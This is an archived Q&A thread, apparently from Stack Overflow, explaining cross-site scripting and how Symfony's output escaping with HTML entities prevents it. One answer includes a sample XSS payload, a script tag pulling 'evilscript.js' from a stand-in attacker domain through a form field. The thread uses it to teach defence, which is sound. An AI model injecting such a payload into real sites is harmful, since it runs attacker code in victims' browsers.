tags:

views:

245

answers:

2
+2  Q: 

How can escaping be used to prevent XSS attacks?

To prevent XSS attacks, output escaping has been enabled;

The above is from symfony,but I don't understand.

A: 

XSS, or Cross Site Scripting is when someone else gets their javascript to be served up by your server. If, for example, you can get random javascript to get served from google.com then you can have that javascript send you everything google knows about the person to whom it's been served.

The avoid this data that may have come from users (rather than from the server / content author) has angle-brackets and other HTML-like stuff escaped so that it won't be executed by end users.

Ry4an  2010-01-29 03:39:10
Do you mean by changing `<` to `"` and so on?
 2010-01-29 03:42:36
You wouldn't change `<` to `"`. You'd change it to `<`.
Anon.  2010-01-29 03:46:57
Yes, changing important metacharacters into entities that display the right glyph, but don't have the same processing effects.
Ry4an  2010-01-29 04:10:19
+3  A: 

XSS is an abbreviation for "Cross-site scripting". Cross-site scripting attacks occur when you manage to sneak a script (usually javascript) onto someone else's website, where it can run maliciously.

XSS is possible when you have user input into a web site. For instance, if I was filling out a web form, and it asked me for my name, I could enter My name is <script src="http://bad.domain/evilscript.js"&gt;&lt;/script&gt;. If I submit the form, and then on the next page it asks me to confirm my details and re-outputs what I entered, the nasty HTML tag that I entered would get rendered and the script would get downloaded and run by the browser.

In order to prevent this, you need to escape user input. Escaping means that you convert (or mark) key characters of the data to prevent it from being interpreted in a dangerous context. In the case of HTML output, you need to convert the < and > characters (among others), to prevent any malcious HTML from rendering. Escaping these characters involves turning them into their entity equivalents &lt; and &gt; (see PHP's htmlspecialchars() function), which will not be interpreted as HTML tags by a browser.

What Symfony is trying to tell you is that it has the capability to do this automatically for your output, and that capability is enabled.

zombat  2010-01-29 03:42:56
Please also note escaping depends on context. See http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet especially the XSS prevention rules
Erlend  2010-01-31 10:54:34

related questions

Why does this remote script cause IE6 to hang?
HTTP input filter like mod_security for WebSphere?
Should I sanitize HTML markup for a hosted CMS?
HTML/Javascript app that runs on the filesystem, security issue
Gracefully closing a frame (toolbar) around an iframe
What's the best method for sanitizing user input with PHP?
How do you htmlencode using html agility pack?
XSS Blacklist - Is anyone aware of a reasonable one?
Do htmlspecialchars and mysql_real_escape_string keep my PHP code safe from injection?
What percentage of my time will be spent in user input verfication during web development?
How do you allow the usage of an <img> while preventing XSS?
What are the best practices for avoid xss attacks in a PHP site
How do use fckEditor safely, without risk of cross site scripting?
Will HTML Encoding prevent all kinds of XSS attacks?
Inform potential clients about security vulnerabilities?
Best Practice: Legitimate Cross-Site Scripting
Access to restricted URI denied code: 1012
How do you set up use HttpOnly cookies in PHP
When is it Best to Sanitize User Input?
How exactly do you configure httpOnlyCookies in ASP.NET?
How do you configure HttpOnly cookies in tomcat / java webapps?
Communicating between websites (using Javascript or ?)
Best regex to catch XSS (Cross-site Scripting) attack (in Java)?
Sanitising user input using Python
Catching SQL Injection and other Malicious Web Requests